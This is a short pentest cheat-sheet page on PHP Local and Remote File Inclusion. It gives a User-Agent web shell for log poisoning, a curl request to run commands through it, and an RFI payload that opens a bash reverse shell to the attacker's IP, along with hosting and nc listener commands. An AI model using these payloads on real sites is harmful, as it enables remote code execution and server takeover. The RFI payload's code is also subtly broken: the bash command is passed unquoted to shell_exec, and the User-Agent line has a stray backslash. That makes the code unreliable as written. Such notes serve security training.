File Inclusion

This vulnerability exists when a file is referenced and any code in the referenced file is included in the code of the referencing page. In other words, the content of the retrieved file is interpreted and executed instead of just read and displayed.

There are two sub classes to this general vulnerability: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI is limited to including files that are on the web server whereas RFI includes files from off the web server.

LFI

Log Poisoning

Log poisoning is where you inject malicious code into the server's log and then execute that code with the LFI vulnerability.

Modifying User-Agent

Using Burp Suite or ZAP, modify the User-Agent to:

User-Agent: <?php echo '<pre>' . shell_exec($_GET['cmd'\]) . '</pre>';?>

The <pre> is used to preserver any line breaks in the output. If this is not included and the output is multi line, it would be easier to read by viewing the source.
The shell_exec executes OS commands
- Another command that can be used is system
The $_GET is an associative array of variables that are passed as URL parameters.

Then include the log file using the LFI.

curl http://vulnsite.com/index.php?file=<path to log>&cmd=<command>

RFI

RFI is usually easier to exploit since you can host the malicious file to be included. However, this does require that allow_url_include and allow_url_fopen to be set to '1' in the php configuration. By default allow_url_fopen is set to '1'; however allow_url_include is set to '0.'

To exploit this:

Create a malicious php file

  <?php echo '<pre>' . shell_exec(/bin/bash -i >& /dev/tcp/<your ip>/<listen port> 0>&1) . '</pre>';?>

Host the shell with a web browser
```
  sudo python3 -m http.server 80
```
Set up a listener
```
  sudo nc -nvlp <port>
```

Include the file using the RFI

  curl http://vulnsite.com/index.php?file=http://<your server>/<file>

PreviousSQLi NextDirectory Traversal

Last updated 4 years ago

Was this helpful?